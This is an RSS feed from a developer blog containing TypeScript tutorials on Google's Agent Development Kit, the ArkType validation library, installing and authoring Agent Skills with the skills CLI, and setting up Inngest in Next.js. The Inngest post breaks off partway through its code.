<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[Nidhin's blog]]></title><description><![CDATA[✨Crafting Code with a Smile for 8 Years:) Merging the Formal Dance of Angular, the Playful Rhythms of React, and the Next-level Moves of Next.js 🚀]]></description><link>https://blog.nidhin.dev</link><generator>RSS for Node</generator><lastBuildDate>Wed, 15 Apr 2026 07:14:51 GMT</lastBuildDate><atom:link href="https://blog.nidhin.dev/rss.xml" rel="self" type="application/rss+xml"/><language><![CDATA[en]]></language><ttl>60</ttl><item><title><![CDATA[Build Your First Agent with Agent Development Kit using TypeScript]]></title><description><![CDATA[The Agent Development Kit (ADK) is an open-source, modular framework designed to shift agent creation from basic prompt engineering to a structured, code-first software development approach. It provid]]></description><link>https://blog.nidhin.dev/build-your-first-agent-with-agent-development-kit-using-typescript</link><guid isPermaLink="true">https://blog.nidhin.dev/build-your-first-agent-with-agent-development-kit-using-typescript</guid><category><![CDATA[AI]]></category><category><![CDATA[adk]]></category><category><![CDATA[agents]]></category><category><![CDATA[Google]]></category><category><![CDATA[mcp]]></category><dc:creator><![CDATA[nidhinkumar]]></dc:creator><pubDate>Tue, 14 Apr 2026 16:02:33 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/6536409b7aa52ef9eb6c6b78/59840b28-1549-47b5-93ac-129043a9a5d2.gif" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>The <strong>Agent Development Kit (ADK)</strong> is an open-source, modular framework designed to shift agent creation from basic prompt engineering to a structured, code-first software development approach. 
It provides developers with the precision and control needed to build complex, enterprise-ready multi-agent systems.</p>
<p>While many examples focus on Python, in this post we are going to build an agent using TypeScript.</p>
<h2>1. Core Features and Benefits of ADK</h2>
<p>ADK simplifies end-to-end development by making it feel like traditional software development. Its features are built around several core pillars:</p>
<h3>a. Precision and Control</h3>
<ul>
<li><p><strong>Flexible Orchestration:</strong> Create predictable pipelines using workflow agents like sequential, parallel, and loop agents.</p>
</li>
<li><p><strong>Dynamic Routing:</strong> For complex scenarios, agents can adapt their strategy in real-time based on LLM-driven reasoning.</p>
</li>
</ul>
<h3>b. Multi-agent Architecture</h3>
<p>Instead of one massive agent, ADK allows you to build a hierarchy of specialized agents. A primary agent can delegate specific tasks to these specialized roles, making the system more reliable and scalable.</p>
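<p>The idea can be sketched in plain TypeScript (a hypothetical illustration of the delegation pattern, not the actual ADK API; the agent names and routing rules below are invented):</p>
<pre><code class="language-typescript">// Hypothetical sketch of hierarchical delegation (this is NOT the ADK API;
// rootAgent, billingAgent, and supportAgent are invented for illustration).
type Task = { kind: "billing" | "support"; payload: string };

function billingAgent(payload: string): string {
  return "billing handled: " + payload;
}

function supportAgent(payload: string): string {
  return "support handled: " + payload;
}

// The root agent only routes work; each specialist owns one narrow task.
function rootAgent(task: Task): string {
  if (task.kind === "billing") {
    return billingAgent(task.payload);
  }
  return supportAgent(task.payload);
}

console.log(rootAgent({ kind: "billing", payload: "refund request" }));
</code></pre>
<p>Because each specialist is small and focused, it can be tested and improved in isolation, which is what makes the hierarchy reliable and scalable.</p>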
<h3>c. Rich Tool Ecosystem</h3>
<p>Agents can leverage pre-built tools such as Google Search and Code Execution, or integrate with custom enterprise APIs and third-party libraries. ADK also allows agents to use other agents as tools.</p>
<h3>d. Code-First and Modular Design</h3>
<p>Agent logic and orchestration are defined directly in code (TypeScript, Python, or Java), which promotes better testability and version control.</p>
<h3>e. Integrated Tooling and Evaluation</h3>
<ul>
<li><p><strong>CLI &amp; Web UI:</strong> Easily run, test, and debug your agents locally</p>
</li>
<li><p><strong>Built-in Evaluation:</strong> Test performance against predefined scenarios to evaluate both the final answer and the reasoning trajectory used to reach it.</p>
</li>
</ul>
<h2>2. The Core Agent Architecture</h2>
<p>In ADK, an agent is defined by the formula: <strong>Agent = Model + Tools + Orchestration</strong>.</p>
<img src="https://cdn.hashnode.com/uploads/covers/6536409b7aa52ef9eb6c6b78/28d58db2-625e-4fe1-89ce-3467a7890ebf.png" alt="" style="display:block;margin:0 auto" />

<h2>3. Getting Started with TypeScript</h2>
<p>Create an empty <code>adk-agent</code> directory for your project:</p>
<pre><code class="language-typescript">adk-agent/
</code></pre>
<p>Use the <code>npm</code> tool to install and configure dependencies for your project, including the package file, ADK TypeScript main library, and developer tools. Run the following commands from your <code>adk-agent/</code> directory to create the <code>package.json</code> file and install the project dependencies:</p>
<pre><code class="language-typescript">cd adk-agent/
# initialize a project as an ES module
npm init --yes
npm pkg set type="module"
npm pkg set main="agent.ts"
# install ADK libraries
npm install @google/adk
# install dev tools as a dev dependency
npm install -D @google/adk-devtools
</code></pre>
<p>Create the code for a basic agent, including a simple implementation of an ADK <a href="https://adk.dev/tools/function-tools/">Function Tool</a>, called <code>getCurrentTime</code>. Create an <code>agent.ts</code> file in your project directory and add the following code:</p>
<pre><code class="language-typescript">import {FunctionTool, LlmAgent} from '@google/adk';
import {z} from 'zod';

/* Mock tool implementation */
const getCurrentTime = new FunctionTool({
  name: 'get_current_time',
  description: 'Returns the current time in a specified city.',
  parameters: z.object({
    city: z.string().describe("The name of the city for which to retrieve the current time."),
  }),
  execute: ({city}) =&gt; {
    return {status: 'success', report: `The current time in ${city} is 10:30 AM`};
  },
});

export const rootAgent = new LlmAgent({
  name: 'hello_time_agent',
  model: 'gemini-2.5-flash',
  description: 'Tells the current time in a specified city.',
  instruction: `You are a helpful assistant that tells the current time in a city.
                Use the 'getCurrentTime' tool for this purpose.`,
  tools: [getCurrentTime],
});
</code></pre>
<h3>Add your API Key</h3>
<p>For this tutorial, we use the Gemini API, which requires an API key. If you don't already have a Gemini API key, create one in Google AI Studio on the <a href="https://aistudio.google.com/app/apikey">API Keys</a> page.</p>
<p>In a terminal window, write your API key into your project's <code>.env</code> file to set the environment variable:</p>
<pre><code class="language-typescript">echo 'GEMINI_API_KEY="YOUR_API_KEY"' &gt; .env
</code></pre>
<h3>Run your Agent</h3>
<p>You can run your ADK agent with the <code>@google/adk-devtools</code> library as an interactive command-line interface using the <code>run</code> command or the ADK web user interface using the <code>web</code> command. Both these options allow you to test and interact with your agent.</p>
<pre><code class="language-typescript">npx adk run agent.ts
</code></pre>
<h3>Run with Web Interface</h3>
<p>Run your agent with the ADK web interface using the following command:</p>
<pre><code class="language-typescript">npx adk web
</code></pre>
<p>This command starts a web server with a chat interface for your agent. You can access the web interface at <a href="http://localhost:8000">http://localhost:8000</a>. Select your agent in the upper-right corner and type a request.</p>
<img src="https://cdn.hashnode.com/uploads/covers/6536409b7aa52ef9eb6c6b78/dd7a9355-29b9-4fd4-a83b-4288a7861271.png" alt="" style="display:block;margin:0 auto" />

<p>Voilà, you have made it! You have created an agent in no time. Congrats! There is still a long way to go, though.</p>
<h3>How it works</h3>
<p>In the <code>agent.ts</code> file, look at the <code>LlmAgent</code> definition again:</p>
<pre><code class="language-typescript">export const rootAgent = new LlmAgent({
  name: 'hello_time_agent',   // Identity: required identifier
  model: 'gemini-2.5-flash',  // Model: the reasoning engine
  description: 'Tells the current time in a specified city.', // Purpose: what this agent does
  instruction: `You are a helpful assistant...`, // Behavior: how to act
  tools: [getCurrentTime],    // Tools: actions the agent can take
  // Orchestration: handled automatically by the LlmAgent class
});
</code></pre>
<ul>
<li><p><strong>Model</strong> (<code>gemini-2.5-flash</code>): The LLM that provides reasoning and decision-making</p>
</li>
<li><p><strong>Tools:</strong> Functions the agent calls to take actions</p>
</li>
<li><p><strong>Orchestration:</strong> The <code>LlmAgent</code> class automatically runs the Perceive → Think → Act → Check loop</p>
</li>
</ul>
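<p>The orchestration loop can be sketched in plain TypeScript (illustrative only; a real <code>LlmAgent</code> asks the model what to do next and dispatches the registered tools, which is far more involved than this):</p>
<pre><code class="language-typescript">// Minimal sketch of the Perceive → Think → Act → Check loop.
// fakeTimeTool stands in for a real tool; the "Think" step below is a
// hard-coded rule standing in for the LLM's decision.
function fakeTimeTool(city: string): string {
  return "The current time in " + city + " is 10:30 AM";
}

function runAgent(request: string): string {
  // Perceive: read the incoming request.
  const city = request.replace("What time is it in ", "").replace("?", "");
  let observation = "";
  let done = false;
  while (!done) {
    // Think: decide which tool to call (a real agent asks the model).
    // Act: invoke the chosen tool with the extracted argument.
    observation = fakeTimeTool(city);
    // Check: a real agent would ask the model whether the task is complete.
    done = observation !== "";
  }
  return observation;
}

console.log(runAgent("What time is it in Paris?"));
</code></pre>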
<p>We will catch up in a new post where we dive deeper into ADK agents. Till then, happy learning :)</p>
]]></content:encoded></item><item><title><![CDATA[ArkType]]></title><description><![CDATA[ArkType is a TypeScript-first runtime type validation library. It allows you to define types and validation rules using TypeScript-like syntax, and then validate data at runtime while keeping full Typ]]></description><link>https://blog.nidhin.dev/arktype</link><guid isPermaLink="true">https://blog.nidhin.dev/arktype</guid><category><![CDATA[TypeScript]]></category><category><![CDATA[Arktype]]></category><category><![CDATA[zod]]></category><category><![CDATA[Validation]]></category><category><![CDATA[JavaScript]]></category><category><![CDATA[runtime]]></category><dc:creator><![CDATA[nidhinkumar]]></dc:creator><pubDate>Sat, 07 Mar 2026 15:27:48 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/6536409b7aa52ef9eb6c6b78/baba169a-6419-4942-9342-5d1261a7b3c6.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><strong>ArkType</strong> is a <strong>TypeScript-first runtime type validation library</strong>. It allows you to define <strong>types and validation rules using TypeScript-like syntax</strong>, and then <strong>validate data at runtime</strong> while keeping full <strong>TypeScript type inference</strong>.</p>
<p>In simple terms</p>
<blockquote>
<p>ArkType lets you define a type <strong>once</strong>, and use it for <strong>both compile-time typing and runtime validation</strong></p>
</blockquote>
<h2>1. Why ArkType is Needed</h2>
<p>In <strong>TypeScript</strong>, types exist only during development (compile time). When your code runs, <strong>TypeScript types disappear</strong>.</p>
<pre><code class="language-typescript">type User = {
  name: string
  age: number
}
</code></pre>
<p>If you receive JSON from an API</p>
<pre><code class="language-typescript">const data = JSON.parse(input)
</code></pre>
<p>TypeScript <strong>cannot guarantee</strong> that <code>data</code> actually matches <code>User</code>.</p>
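<p>Without a validation library, you would have to hand-write a runtime check for every type. This boilerplate is exactly what ArkType generates for you from a single definition:</p>
<pre><code class="language-typescript">// A hand-written runtime type guard for the User shape above.
type User = { name: string; age: number };

function isUser(data: unknown): data is User {
  if (typeof data !== "object" || data === null) return false;
  const candidate = data as { name?: unknown; age?: unknown };
  if (typeof candidate.name !== "string") return false;
  return typeof candidate.age === "number";
}

console.log(isUser({ name: "John", age: 30 })); // valid
console.log(isUser({ name: "John" }));          // missing age
</code></pre>
<p>Multiply this by every type in your codebase, and the appeal of defining the shape once becomes obvious.</p>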
<p>This is where ArkType helps — it <strong>validates the data at runtime</strong>.</p>
<pre><code class="language-typescript">import { type } from "arktype"

const User = type({
  name: "string",
  age: "number"
})

const result = User({ name: "John", age: 30 })

if (result instanceof type.errors) {
  console.log(result.summary)
} else {
  console.log("Valid user")
}
</code></pre>
<p>What happens in the above code</p>
<ol>
<li><p>We define a <strong>schema</strong></p>
</li>
<li><p>Pass data to it</p>
</li>
<li><p>ArkType <strong>validates it at runtime</strong></p>
</li>
<li><p>TypeScript automatically knows the type.</p>
</li>
</ol>
<h2>2. Features of ArkType</h2>
<h3>a. TypeScript-like syntax</h3>
<pre><code class="language-typescript">const User = type({
  id: "number",
  email: "string.email",
  age: "number &gt;= 18"
})
</code></pre>
<h3>b. Runtime validation errors</h3>
<pre><code class="language-typescript">User({
  id: 1,
  email: "test@mail.com",
  age: 20
})
</code></pre>
<p>Invalid input returns structured, readable errors rather than throwing.</p>
<h3>c. Full Type Inference</h3>
<pre><code class="language-typescript">type UserType = typeof User.infer
</code></pre>
<p>TypeScript automatically understands the type.</p>
<h3>d. Very Fast</h3>
<p>ArkType is designed to be <strong>extremely fast</strong> compared to many validation libraries such as Zod and Yup. ArkType can validate a value in about 14 nanoseconds at runtime, which is roughly 20x faster than Zod and 2,000x faster than Yup.</p>
<p>You can check the benchmarks here: <a href="https://moltar.github.io/typescript-runtime-type-benchmarks/">https://moltar.github.io/typescript-runtime-type-benchmarks/</a></p>
<h2><strong>3. Comparison with other libraries</strong></h2>
<table>
<thead>
<tr>
<th>Library</th>
<th>Syntax</th>
<th>Speed</th>
<th>TypeScript Integration</th>
</tr>
</thead>
<tbody><tr>
<td>ArkType</td>
<td>Very Simple</td>
<td>Very Fast</td>
<td>Excellent</td>
</tr>
<tr>
<td>Zod</td>
<td>Verbose</td>
<td>Medium</td>
<td>Good</td>
</tr>
<tr>
<td>Yup</td>
<td>Verbose</td>
<td>Slower</td>
<td>Limited</td>
</tr>
<tr>
<td>Joi</td>
<td>Complex</td>
<td>Medium</td>
<td>Weak</td>
</tr>
</tbody></table>
<p>ArkType</p>
<pre><code class="language-typescript">const User = type({
  name: "string",
  age: "number &gt; 18"
})

// extract the type if needed
type User = typeof User.infer
</code></pre>
<p>Zod</p>
<pre><code class="language-typescript">const User = z.object({
  name: z.string(),
  age: z.number().min(18)
})
</code></pre>
<p>ArkType is much shorter and closer to natural TypeScript.</p>
<h2>4. Installation &amp; Setup of ArkType in your Project</h2>
<p>You can install ArkType with the following command (shown here with Bun; <code>npm install arktype</code> works as well):</p>
<pre><code class="language-bash">bun install arktype
</code></pre>
<p>Ensure you have</p>
<ul>
<li><p>TypeScript version <code>&gt;=5.1</code>.</p>
</li>
<li><p>A <code>package.json</code> with <code>"type": "module"</code> (or an environment that supports ESM imports)</p>
</li>
<li><p>A <code>tsconfig.json</code> with...</p>
<ul>
<li><p><code>strict</code> or <code>strictNullChecks</code> (<strong>required</strong>)</p>
</li>
<li><p><code>skipLibCheck</code> (recommended)</p>
</li>
<li><p><code>exactOptionalPropertyTypes</code> (recommended)</p>
</li>
</ul>
</li>
</ul>
<p><strong>VS Code Extension</strong> - To take advantage of all of ArkType's autocomplete capabilities, you'll need to add the following to your workspace settings at <code>.vscode/settings.json</code>:</p>
<pre><code class="language-typescript">// allow autocomplete for ArkType expressions like "string | num"
"editor.quickSuggestions": {
	"strings": "on"
},
// prioritize ArkType's "type" for autoimports
"typescript.preferences.autoImportSpecifierExcludeRegexes": [
	"^(node:)?os$"
],
</code></pre>
<p>You can check more about ArkType from their official documentation: <a href="https://arktype.io/docs/intro/setup">https://arktype.io/docs/intro/setup</a></p>
<p>That covers the basics of ArkType. Now start building things with it and see how it works for you.</p>
<p>Will catch up in another interesting post :)</p>
]]></content:encoded></item><item><title><![CDATA[Agent Skills]]></title><description><![CDATA[Are you ready to supercharge your AI agents? Imagine an AI that not only understands your requests but can also execute complex, multi-step tasks with precision. This is where Agent Skills come in, and they're set to revolutionize how we interact wit...]]></description><link>https://blog.nidhin.dev/agent-skills</link><guid isPermaLink="true">https://blog.nidhin.dev/agent-skills</guid><category><![CDATA[agentskils]]></category><category><![CDATA[claude cli]]></category><category><![CDATA[AI]]></category><category><![CDATA[agentic AI]]></category><category><![CDATA[skills]]></category><category><![CDATA[Vercel]]></category><category><![CDATA[claude.ai]]></category><dc:creator><![CDATA[nidhinkumar]]></dc:creator><pubDate>Sat, 07 Feb 2026 15:40:53 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1770478608460/bc5ef923-e9ae-4ce5-b367-6deaebfc530e.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Are you ready to supercharge your AI agents? Imagine an AI that not only understands your requests but can also execute complex, multi-step tasks with precision. This is where <strong>Agent Skills</strong> come in, and they're set to revolutionize how we interact with AI!</p>
<h2 id="heading-1about-agent-skills">1.About Agent Skills</h2>
<p>Agent Skills, introduced by Anthropic in October 2025, are an innovative way to share procedural knowledge with AI agents. At their core, these skills are simple yet powerful: they're <strong>markdown files</strong> containing clear, specific instructions for your AI.</p>
<p>Think of them as mini-manuals that teach your AI exactly how to perform a task. Each skill comes with a <strong>YAML header</strong> that includes a name and description, giving your agent the necessary context before diving into action.</p>
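<p>A minimal skill file might look like this (a hypothetical example; the exact frontmatter fields an agent reads can vary by platform):</p>
<pre><code class="language-markdown">---
name: code-review
description: Reviews pull requests for style and correctness issues.
---

# Code Review

1. Read the diff and summarize the change in one sentence.
2. Flag style violations and potential bugs, citing file and line.
3. Suggest a concrete fix for each issue you flag.
</code></pre>
<p>The YAML header gives the agent enough context to decide when the skill applies; the body is the mini-manual it follows once activated.</p>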
<p>The brilliance of Agent Skills quickly caught on, leading to an <strong>open standard</strong> that has been embraced by major players in the AI world, including OpenAI Codex, Microsoft, GitHub, and Cursor. This widespread adoption means a more unified and portable way to enhance AI capabilities across different platforms.</p>
<h2 id="heading-2skillssh-your-new-best-friend-for-skill-management">2.Skills.sh - <strong>Your New Best Friend for Skill Management</strong></h2>
<p>Managing these powerful skills has never been easier, thanks to <a target="_blank" href="http://skills.sh"><strong>skills.sh</strong></a>, Vercel's new command-line interface (CLI) tool. This tool simplifies the process of installing and managing skills, making it accessible even for those new to AI agent development.</p>
<h2 id="heading-3getting-started">3.Getting Started</h2>
<p>To install a skill, use the <code>skills</code> CLI:</p>
<pre><code class="lang-typescript">npx skills add vercel-labs/agent-skills
</code></pre>
<p>This will install the skill and make it available to your AI agent.</p>
<p>Go to a project where you need a skill. For one of my projects, I am using an Anthropic skill for a simple website: <code>npx skills add anthropics/skills</code></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1770475845462/5a6e0533-702c-4fe3-bd16-0e0bcd47e382.png" alt class="image--center mx-auto" /></p>
<p>Once the package is installed, you can choose the skill that you want (in my case, <code>frontend-design</code>). After that, you can choose which agent should receive the skill.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1770475923278/c5a9d8e4-0f18-4ff2-843f-568e3247092f.png" alt class="image--center mx-auto" /></p>
<p>After choosing the agent, you can see that the skill repo is cloned and the skill is added.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1770475978599/54e67fae-8be3-49d5-9925-0fd4178d4337.png" alt class="image--center mx-auto" /></p>
<p>If you open your project now, you can see that skill. For example, if you chose the Claude agent, the skill appears like below:</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1770476100991/53e140b3-ac16-44a5-a0ce-2757e5b96398.png" alt class="image--center mx-auto" /></p>
<p>And now you can give your Claude agent the instructions that you want, and it will take the skill's instructions into account.</p>
<h2 id="heading-4creating-your-own-skill">4.Creating your own skill</h2>
<p>You can create your own skill and publish it to the Vercel skills directory. Getting started is very simple:</p>
<pre><code class="lang-typescript">npx skills --help
</code></pre>
<p>You can see the list of options from the skills CLI like below:</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1770476368863/23b03d85-8dd5-439e-ba1e-75dce69ed39e.png" alt class="image--center mx-auto" /></p>
<p>Now we will create a new skill for code review using the below command</p>
<pre><code class="lang-typescript">npx skills init skills code-review
</code></pre>
<p>This will create a skill like below:</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1770476596862/c5c9a560-ded9-48af-988f-5636eb631bc6.png" alt class="image--center mx-auto" /></p>
<p>And if you open the project folder you can see a skill template like below</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1770476884892/e1398d6c-2d9f-4999-ae47-9e26e25bc90c.png" alt class="image--center mx-auto" /></p>
<p>Now we will add the skill-creator skill so that we know the structure we need to follow. Add it using the below command:</p>
<pre><code class="lang-typescript">npx skills add https:<span class="hljs-comment">//github.com/anthropics/skills --skill skill-creator</span>
</code></pre>
<p>Once the skill-creator is installed you would see something like this in your project directory</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1770477111013/2cb5cb26-5b88-4463-aa67-ae7247380131.png" alt class="image--center mx-auto" /></p>
<p>Now you can update the instructions based on your needs and share the skill.</p>
<p>We will take one more example: downloading the React best practices skill. Download it with:</p>
<pre><code class="lang-typescript">npx skills add https:<span class="hljs-comment">//github.com/vercel-labs/agent-skills --skill vercel-react-best-practices</span>
</code></pre>
<p>Once the skill is downloaded, you can see three things inside the <code>vercel-react-best-practices</code> directory under <code>.claude</code>:</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1770477998275/957e0481-0af9-4ec5-8e65-de53cdaafc62.png" alt class="image--center mx-auto" /></p>
<ul>
<li><p><strong>AGENTS.md</strong> - mainly for agents and LLMs to follow when maintaining the skill</p>
</li>
<li><p><strong>SKILL.md</strong> - guidelines for the skill</p>
</li>
<li><p>rules directory - Here you can find the best practices along with examples like below</p>
<p>  <img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1770478137601/a27bacd2-2882-4342-a973-f738340e7a82.png" alt class="image--center mx-auto" /></p>
</li>
</ul>
<h2 id="heading-5how-to-validate-a-skill">5.How to Validate a Skill</h2>
<p>When building a skill, it's crucial to <strong>work iteratively</strong> on it until it reaches a state where you can fully delegate the task to Claude.</p>
<ul>
<li><p><strong>Generate log files:</strong> Once you have validated that your skill works correctly, you should generate log files. This helps ensure that you don't accidentally use a skill that has not been properly validated.</p>
</li>
<li><p><strong>Teach Claude edge cases:</strong> You need to teach Claude or your AI agent the <strong>edge cases</strong> to ensure it handles them well, and then add these to the skill. This iterative process helps refine the skill until it consistently produces the desired results.</p>
</li>
</ul>
<h2 id="heading-6sharing-a-skill-via-github">6.Sharing a skill via GitHub</h2>
<p>Skills are shared via GitHub by housing them within a <code>skills</code> directory inside a GitHub repository.</p>
<p>Here's how it works:</p>
<ul>
<li><p>The entire set of skills for a project lives inside this <code>skills</code> directory.</p>
</li>
<li><p>Each specific skill will have its own directory within this main <code>skills</code> folder.</p>
</li>
<li><p>Inside each individual skill's directory, there is a <code>SKILL.md</code> file, which serves as the <strong>entry point</strong> for the AI agent. This file contains the skill's description and main instructions.</p>
</li>
<li><p>Alongside the <code>SKILL.md</code> file, you can include other resources like <strong>scripts, additional markdown files, or templates</strong> that the skill might need.</p>
</li>
<li><p>This structure allows skills to be easily cloned and installed by other users using tools like <a target="_blank" href="http://skills.sh"><code>skills.sh</code></a>.</p>
</li>
</ul>
<p>This method is convenient because a skill can live in the same repository as the tool it teaches the agent to use, making it easy to update the skill whenever the tool is updated.</p>
<p>Voilà! We have learned how to use a skill in our project, as well as how to create our own.</p>
<p>You can find some great skills in the Vercel skills directory 🎉</p>
<div class="embed-wrapper"><div class="embed-loading"><div class="loadingRow"></div><div class="loadingRow"></div></div><a class="embed-card" href="https://skills.sh/">https://skills.sh/</a></div>
<p> </p>
<p>The sky is the limit for what you can do with them.</p>
]]></content:encoded></item><item><title><![CDATA[Inngest - 101]]></title><description><![CDATA[In the era of AI and bots, have you ever wondered how long-running tasks—like waiting for a response from an assistant—actually work behind the scenes? With a traditional HTTP request, this kind of interaction isn’t always feasible, since HTTP is typ...]]></description><link>https://blog.nidhin.dev/inngest-101</link><guid isPermaLink="true">https://blog.nidhin.dev/inngest-101</guid><category><![CDATA[Inngest]]></category><category><![CDATA[workflows]]></category><category><![CDATA[Next.js]]></category><category><![CDATA[background]]></category><category><![CDATA[agents]]></category><dc:creator><![CDATA[nidhinkumar]]></dc:creator><pubDate>Sun, 01 Feb 2026 18:06:56 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1769968885217/20181e6d-f96d-416a-b724-74b9fa2984ae.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>In the era of AI and bots, have you ever wondered how long-running tasks—like waiting for a response from an assistant—actually work behind the scenes? With a traditional HTTP request, this kind of interaction isn’t always feasible, since HTTP is typically short-lived and request–response based.</p>
<p>To support real-time, bi-directional communication, developers often rely on technologies like WebSockets.</p>
<p>This is where <strong>Inngest</strong> comes in.</p>
<h2 id="heading-1-what-is-inngest">1. What is Inngest?</h2>
<p>Inngest replaces traditional message queues (like RabbitMQ or SQS) and state management systems. It allows you to write plain functions in TypeScript, Python, or Go that are <strong>durable</strong>—meaning they can run for minutes, hours, or months, survive server restarts, and automatically retry on failure.</p>
<p><strong>Key Concepts</strong></p>
<ul>
<li><p><strong>Events:</strong> Instead of calling a function directly, you "send" an event (like <code>user.signup</code>). Inngest then triggers any functions listening for that event.</p>
</li>
<li><p><strong>Steps:</strong> Functions are broken into atomic "steps" (<code>step.run</code>, <code>step.sleep</code>). If a function fails at step 3, Inngest knows to retry only step 3 without re-running steps 1 and 2.</p>
</li>
<li><p><strong>Durable Execution:</strong> Inngest handles the state and "waits" for you. For example, you can tell a function to <code>step.sleep("wait-a-week", "7d")</code>, and the function will pause and resume a week later.</p>
</li>
</ul>
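<p>The "retry only the failed step" behavior can be illustrated with a tiny memoizing step runner (a simplified sketch of the idea only, not Inngest's implementation; the step names and workflow here are invented):</p>
<pre><code class="language-typescript">// Completed step results are saved, so re-running the workflow after a
// failure skips straight past the steps that already succeeded.
const memo: { [id: string]: string } = {};

interface StepFn { (): string }

function runStep(id: string, fn: StepFn): string {
  if (id in memo) return memo[id]; // already ran: reuse the saved result
  const result = fn();             // may throw; nothing is memoized then
  memo[id] = result;
  return result;
}

let step1Runs = 0;
let step2Calls = 0;

function workflow(): string {
  const first = runStep("step-1", function () {
    step1Runs += 1;
    return "charged card";
  });
  const second = runStep("step-2", function () {
    step2Calls += 1;
    if (step2Calls === 1) {
      throw new Error("transient failure");
    }
    return "sent email";
  });
  return first + " and " + second;
}

// First attempt fails at step 2; the retry re-invokes the whole workflow,
// but step 1's memoized result means its code executes only once.
try {
  workflow();
} catch (err) {
  // transient failure on the first attempt
}
console.log(workflow()); // "charged card and sent email"
console.log(step1Runs);  // 1
</code></pre>
<p>Inngest does this bookkeeping durably (persisted across servers and restarts), which is why a function can fail, sleep, or wait for months without losing its place.</p>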
<h2 id="heading-2-core-features">2. Core Features</h2>
<ul>
<li><p><strong>Zero Infrastructure:</strong> You don’t need to host a queue or a worker. Inngest calls your functions via a secure HTTPS webhook.</p>
</li>
<li><p><strong>Flow Control:</strong> Built-in support for <strong>concurrency</strong> (limit how many jobs run at once), <strong>throttling</strong> (limit throughput to third-party APIs), and <strong>debouncing</strong>.</p>
</li>
<li><p><strong>Observability:</strong> A built-in dashboard shows every event, every function run, and precisely where a workflow failed or is currently paused.</p>
</li>
<li><p><strong>Local Development:</strong> The <strong>Inngest Dev Server</strong> gives you a local UI to trigger events and visualize your functions as you write them.</p>
</li>
</ul>
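<p>To get a feel for what concurrency control means, here is a toy limiter in plain TypeScript (a sketch of the concept only; with Inngest you configure a concurrency limit on the function instead of writing this yourself):</p>
<pre><code class="language-typescript">// Run jobs in batches of `limit` — a crude way to cap how many are in
// flight at once. `peak` records the highest observed concurrency.
async function sleep(ms: number) {
  return new Promise(function (resolve) { setTimeout(resolve, ms); });
}

let running = 0;
let peak = 0;

async function job(id: number) {
  running += 1;
  peak = Math.max(peak, running);
  await sleep(10); // stand-in for real work, e.g. a third-party API call
  running -= 1;
  return id;
}

async function runAll(limit: number, ids: number[]) {
  const queue = ids.slice();
  const results: number[] = [];
  while (queue.length !== 0) {
    const batch = queue.splice(0, limit);
    const settled = await Promise.all(batch.map(job));
    results.push(...settled);
  }
  return results;
}

runAll(2, [1, 2, 3, 4, 5]).then(function (results) {
  console.log(results); // results arrive in order
  console.log(peak);    // never more than two jobs in flight
});
</code></pre>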
<p>You can read more about Inngest and its features in the official documentation</p>
<div class="embed-wrapper"><div class="embed-loading"><div class="loadingRow"></div><div class="loadingRow"></div></div><a class="embed-card" href="https://www.inngest.com/">https://www.inngest.com/</a></div>
<p> </p>
<p>Now we will see how to integrate Inngest into a Next.js application.</p>
<h2 id="heading-3nextjs-quick-start">3.Next.js Quick Start</h2>
<p>Before we start, ensure you have created a Next.js application using the below command:</p>
<pre><code class="lang-bash">npx create-next-app@latest --ts --eslint --tailwind --src-dir --app --import-alias=<span class="hljs-string">'@/*'</span> inngest-guide
</code></pre>
<p>Once done, run the application with <code>npm run dev</code>.</p>
<p>Now we will install Inngest. With the Next.js app running, open a new tab in your terminal. In your project's root directory, run the following command to install the Inngest SDK:</p>
<pre><code class="lang-bash">npm install inngest
</code></pre>
<p>Next, run the Inngest Dev Server, a fast, in-memory version of Inngest where we can quickly send and view events and function runs:</p>
<pre><code class="lang-bash">npx --ignore-scripts=<span class="hljs-literal">false</span> inngest-cli@latest dev
</code></pre>
<p>In your browser open <a target="_blank" href="http://localhost:8288">http://localhost:8288</a> to see the development UI where later you will test the functions you write:</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1769967306439/3bbd677c-f37f-4149-9bce-cc1f1825d075.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-create-an-inngest-client">Create an Inngest Client</h3>
<p>Inngest invokes your functions securely via an API endpoint at <code>/api/inngest</code>. To enable that, you will create an Inngest client in your Next.js project, which you will use to send events and create functions.</p>
<p>Make a new directory next to your <code>app</code> directory (for example, <code>src/inngest</code>) where you'll define your Inngest functions and the client.</p>
<p>In the <code>src/inngest</code> directory, create a <code>client.ts</code> file containing an Inngest client:</p>
<pre><code class="lang-typescript"><span class="hljs-keyword">import</span> { Inngest } <span class="hljs-keyword">from</span> <span class="hljs-string">"inngest"</span>;

<span class="hljs-comment">// Create a client to send and receive events</span>
<span class="hljs-keyword">export</span> <span class="hljs-keyword">const</span> inngest = <span class="hljs-keyword">new</span> Inngest({ id: <span class="hljs-string">"my-app"</span> });
</code></pre>
<p>Next, we will set up a route handler for the <code>/api/inngest</code> route. To do so, create a file inside your <code>app</code> directory (for example, at <code>src/app/api/inngest/route.ts</code>) with the following code:</p>
<pre><code class="lang-typescript"><span class="hljs-keyword">import</span> { serve } <span class="hljs-keyword">from</span> <span class="hljs-string">"inngest/next"</span>;
